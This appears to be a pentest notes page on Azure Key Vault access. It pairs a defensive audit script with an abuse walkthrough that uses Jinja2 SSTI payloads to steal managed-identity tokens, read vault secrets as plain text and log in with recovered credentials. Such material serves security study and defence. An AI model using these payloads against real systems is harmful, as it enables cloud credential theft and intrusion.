# Key Vault

Key Vault is Azure's service for storing secrets such as passwords, connection strings, certificates and private keys. With the right permissions, Azure resources that support managed identities (VMs, App Service, Functions, containers) can securely retrieve secrets from the key vault.

<figure><img src="/files/7OqjWVbULVh1J7QiXZ8U" alt="" width="375"><figcaption></figcaption></figure>

### Identifier

Objects in a key vault are identified by an object identifier URL. The base URL has the format:

```http
https://{vault-name}.vault.azure.net/{object-type}/{object-name}/{object-version}
```

The vault-name is globally unique, and the object-type is one of "keys", "secrets" or "certificates".

### Access to key vaults

Key Vaults support both RBAC and access policies. With RBAC role assignments, an application can, for example, hold the "Key Vault Secrets User" or "Key Vault Administrator" role.

{% hint style="warning" %}
From a defensive perspective, do not use access policies for key vaults! Access policies can be edited by roles other than the owner of the key vault, such as Contributor.
{% endhint %}

If we can compromise an Azure resource whose managed identity can read secrets from a key vault, it may be possible to gain access to further resources. Note that each secret has its own IAM, inherited from the key vault.

**Roles who can access secrets**

<figure><img src="/files/diVhM2hnVc9HnYz715An" alt=""><figcaption></figcaption></figure>
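The following audit script is an added example, not part of the original notes: it lists every vault in the current subscription, flags vaults that still use access policies (the model the warning above advises against) together with the principals those policies grant secret access to, and for RBAC vaults lists the role assignments that grant data-plane secret access, including ones inherited from the resource group or subscription. It assumes an authenticated Az PowerShell session with the Az.KeyVault and Az.Resources modules and read access to the vaults; the function name is my own.

```powershell
# Added audit example (not from the original notes). Assumes an authenticated
# Az PowerShell session (Connect-AzAccount) with read access to the vaults.
function Get-KeyVaultSecretAccessReport {
    [CmdletBinding()]
    param()

    foreach ($item in Get-AzKeyVault) {
        # The parameterless call returns summary objects; fetch the full vault
        # so EnableRbacAuthorization and AccessPolicies are populated.
        $kv = Get-AzKeyVault -VaultName $item.VaultName -ResourceGroupName $item.ResourceGroupName

        if (-not $kv.EnableRbacAuthorization) {
            # Access-policy mode: anyone who can write the vault resource
            # (e.g. Contributor on the resource group) can grant secret access.
            foreach ($policy in $kv.AccessPolicies) {
                if ($policy.PermissionsToSecrets -contains 'get' -or
                    $policy.PermissionsToSecrets -contains 'list') {
                    [pscustomobject]@{
                        Vault      = $kv.VaultName
                        Model      = 'AccessPolicy'
                        Principal  = $policy.DisplayName
                        ObjectId   = $policy.ObjectId
                        Permission = ($policy.PermissionsToSecrets -join ',')
                        Finding    = 'Vault uses access policies; migrate to RBAC'
                    }
                }
            }
            continue
        }

        # RBAC mode: only explicit role assignments grant data-plane access.
        # -Scope on the vault resource ID also returns inherited assignments.
        $secretRoles = 'Key Vault Secrets User', 'Key Vault Secrets Officer', 'Key Vault Administrator'
        Get-AzRoleAssignment -Scope $kv.ResourceId |
            Where-Object { $_.RoleDefinitionName -in $secretRoles } |
            ForEach-Object {
                [pscustomobject]@{
                    Vault      = $kv.VaultName
                    Model      = 'RBAC'
                    Principal  = $_.DisplayName
                    ObjectId   = $_.ObjectId
                    Permission = $_.RoleDefinitionName
                    # Managed identities and app registrations are the path the abuse below relies on.
                    Finding    = if ($_.ObjectType -eq 'ServicePrincipal') { 'Review workload identity' } else { 'OK' }
                }
            }
    }
}

Get-KeyVaultSecretAccessReport | Format-Table -AutoSize
```

Vaults reported under the `AccessPolicy` model can be switched to RBAC with `Update-AzKeyVault -EnableRbacAuthorization $true`, after which role assignments must be created for the principals that still need access.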

### Abuse example

We have an App Service that is vulnerable to Jinja2 SSTI. We get an access token for vault.azure.net from the managed identity endpoint:

```python
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read() }}
```

We will also need an access token for ARM (management.azure.com):

```python
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read() }}
```

We connect with Az PowerShell using both tokens:

```powershell
# $armtoken: token for https://management.azure.com/, $token: token for https://vault.azure.net/
# The Key Vault token parameter of Connect-AzAccount is -KeyVaultAccessToken
Connect-AzAccount -AccessToken $armtoken -AccountId 2e91a4fe-a0f2-46ee-8214-xxx -KeyVaultAccessToken $token
```

Next, check whether we have at least a reader role on a key vault:

```powershell
Get-AzKeyVault


Vault Name          : vault
Resource Group Name : Research
Location            : germanywestcentral
```

Check whether we can read secrets:

```powershell
Get-AzKeyVaultSecret -VaultName vault


Vault Name   : researchkeyvault
Name         : Reader
Version      :
Id           : https://vault.vault.azure.net:443/secrets/Reader
Enabled      : True
Expires      :
Not Before   :
Created      : 1/7/2025 8:04:22 AM
Updated      : 1/7/2025 8:04:22 AM
Content Type :
Tags         :
```

Finally, extract the secret as plain text:

```powershell
Get-AzKeyVaultSecret -VaultName xxx -Name Reader -AsPlainText
username: xx@xxx.onmicrosoft.com ; password: Password123!
```

Use the recovered credentials to connect with Az PowerShell:

```powershell
# Password as returned by Get-AzKeyVaultSecret -AsPlainText above
$passwd = ConvertTo-SecureString "Password123!" -AsPlainText -Force
$creds  = New-Object System.Management.Automation.PSCredential ("xx@xx.onmicrosoft.com", $passwd)
Connect-AzAccount -Credential $creds
```
